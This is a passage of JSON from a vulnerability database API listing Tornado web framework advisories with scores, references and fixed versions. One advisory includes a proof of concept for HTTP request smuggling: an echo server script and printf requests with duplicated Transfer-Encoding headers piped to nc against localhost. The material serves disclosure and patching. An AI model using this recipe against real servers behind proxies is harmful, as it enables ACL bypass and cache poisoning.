"2026-04-07T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75653", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75709", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75716", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75686", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00904", "scoring_system": "epss", "scoring_elements": "0.75655", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2014-9720" }, { "reference_url": "https://bugzilla.novell.com/show_bug.cgi?id=930362", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://bugzilla.novell.com/show_bug.cgi?id=930362" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9720", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9720" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2020-213.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2020-213.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720" }, { "reference_url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html" }, { "reference_url": "https://github.com/advisories/GHSA-8vpw-mgpf-mpvv", "reference_id": "GHSA-8vpw-mgpf-mpvv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8vpw-mgpf-mpvv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/9954?format=api", "purl": "pkg:pypi/tornado@3.2.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@3.2.2" } ], "aliases": [ "CVE-2014-9720", "GHSA-8vpw-mgpf-mpvv", "PYSEC-2020-213" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8kva-hv12-9ydc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23864?format=api", "vulnerability_id": "VCID-be89-uuxa-fyb5", "summary": "Tornado is vulnerable to DoS due to too many multipart parts\nIn versions of Tornado prior to 6.5.5, the only limit on the number of parts in `multipart/form-data` is the `max_body_size` setting (default 100MB). Since parsing occurs synchronously on the main thread, this creates the possibility of denial-of-service due to the cost of parsing very large multipart bodies with many parts. \n\nTornado 6.5.5 introduces new limits on the size and complexity of multipart bodies, including a default limit of 100 parts per request. These limits are configurable if needed; see `tornado.httputil.ParseMultipartConfig`. It is also now possible to disable `multipart/form-data` parsing entirely if it is not required for the application.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31958.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31958.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31958", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08476", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08482", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08464", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08392", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08472", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.08419", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.0929", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09304", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-31958" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31958", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31958" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/119a195e290c43ad2d63a2cf012c29d43d6ed839", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/119a195e290c43ad2d63a2cf012c29d43d6ed839" }, { "reference_url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-qjxf-f2mg-c6mc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-12T19:55:43Z/" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-qjxf-f2mg-c6mc" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00000.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00000.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31958", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31958" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1130507", "reference_id": "1130507", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1130507" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446765", "reference_id": "2446765", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446765" }, { "reference_url": "https://github.com/advisories/GHSA-qjxf-f2mg-c6mc", "reference_id": "GHSA-qjxf-f2mg-c6mc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qjxf-f2mg-c6mc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66661?format=api", "purl": "pkg:pypi/tornado@6.5.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.5.5" } ], "aliases": [ "CVE-2026-31958", "GHSA-qjxf-f2mg-c6mc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-be89-uuxa-fyb5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/5273?format=api", "vulnerability_id": "VCID-byy6-ku5b-ykew", "summary": "CRLF injection vulnerability in the tornado.web.RequestHandler.set_header function in Tornado before 2.2.1 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted input.", "references": [ { "reference_url": "http://openwall.com/lists/oss-security/2012/05/18/12", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://openwall.com/lists/oss-security/2012/05/18/12" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2012-2374", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55909", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55772", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55884", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55906", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55885", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55935", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55938", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55947", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00329", "scoring_system": "epss", "scoring_elements": "0.55927", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2012-2374" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2374", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2374" }, { "reference_url": "http://secunia.com/advisories/49185", "reference_id": "", "reference_type": "", "scores": [], "url": "http://secunia.com/advisories/49185" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2012-5.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tornado/PYSEC-2012-5.yaml" }, { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/1ae91f6d58e6257e0ab49d295d8741ce1727bdb7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/1ae91f6d58e6257e0ab49d295d8741ce1727bdb7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2374", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2374" }, { "reference_url": "https://web.archive.org/web/20140720192646/http://secunia.com/advisories/49185", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20140720192646/http://secunia.com/advisories/49185" }, { "reference_url": "https://web.archive.org/web/20200229124524/http://www.securityfocus.com/bid/53612", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20200229124524/http://www.securityfocus.com/bid/53612" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2012/05/18/6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2012/05/18/6" }, { "reference_url": "http://www.securityfocus.com/bid/53612", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/53612" }, { "reference_url": "http://www.tornadoweb.org/documentation/releases/v2.2.1.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.tornadoweb.org/documentation/releases/v2.2.1.html" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673987", "reference_id": "673987", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673987" }, { "reference_url": "https://github.com/advisories/GHSA-f7fv-v9rh-prvc", "reference_id": "GHSA-f7fv-v9rh-prvc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f7fv-v9rh-prvc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/2271?format=api", "purl": "pkg:pypi/tornado@2.2.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-6knn-nt2y-1uem" }, { "vulnerability": "VCID-8kva-hv12-9ydc" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-jf6j-dngc-6qdp" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.2.1" } ], "aliases": [ "CVE-2012-2374", "GHSA-f7fv-v9rh-prvc", "PYSEC-2012-5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-byy6-ku5b-ykew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18609?format=api", "vulnerability_id": "VCID-e25f-6gkj-vfgw", "summary": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado\n### Summary\nWhen Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.\n\n### PoC\n0. Install Tornado.\n1. Start a simple Tornado server that echoes each received request's body:\n```bash\ncat << EOF > server.py\nimport asyncio\nimport tornado\n\nclass MainHandler(tornado.web.RequestHandler):\n def post(self):\n self.write(self.request.body)\n\nasync def main():\n tornado.web.Application([(r\"/\", MainHandler)]).listen(8000)\n await asyncio.Event().wait()\n\nasyncio.run(main())\nEOF\npython3 server.py &\n```\n2. Send a valid chunked request:\n```bash\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n3. Observe that the response is as expected:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:32:05 GMT\nContent-Length: 1\n\nZ\n```\n4. Send a request with two `Transfer-Encoding: chunked` headers:\n```\nprintf 'POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n1\\r\\nZ\\r\\n0\\r\\n\\r\\n' | nc localhost 8000\n```\n5. Observe the strange response:\n```\nHTTP/1.1 200 OK\nServer: TornadoServer/6.3.3\nContent-Type: text/html; charset=UTF-8\nDate: Sat, 07 Oct 2023 17:35:40 GMT\nContent-Length: 0\n\nHTTP/1.1 400 Bad Request\n\n```\nThis is because Tornado believes that the request has no message body, so it tries to interpret `1\\r\\nZ\\r\\n0\\r\\n\\r\\n` as its own request, which causes a 400 response. With a little cleverness involving `chunk-ext`s, you can get Tornado to instead respond 405, which has the potential to desynchronize the connection, as opposed to 400 which should always result in a connection closure.\n\n### Impact\nAnyone using Tornado behind a proxy that forwards requests containing multiple `Transfer-Encoding: chunked` headers is vulnerable to request smuggling, which may entail ACL bypass, cache poisoning, or connection desynchronization.", "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/d65f6e71a77f53a1ff0a0dc55704be13f04eb572" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-753j-mpmx-qq6g" }, { "reference_url": "https://github.com/advisories/GHSA-753j-mpmx-qq6g", "reference_id": "GHSA-753j-mpmx-qq6g", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-753j-mpmx-qq6g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58666?format=api", "purl": "pkg:pypi/tornado@6.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.1" } ], "aliases": [ "GHSA-753j-mpmx-qq6g" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e25f-6gkj-vfgw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23702?format=api", "vulnerability_id": "VCID-jbwv-ayru-8fgm", "summary": "Tornado has incomplete validation of cookie attributes\nValues passed to the `domain`, `path`, and `samesite` arguments of `RequestHandler.set_cookie` were not completely validated in versions of Tornado prior to 6.5.5. In particular, semicolons would be allowed, which could be used to inject attacker-controlled values for other cookie attributes.", "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/24a2d96ea115f663b223887deb0060f13974c104", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } 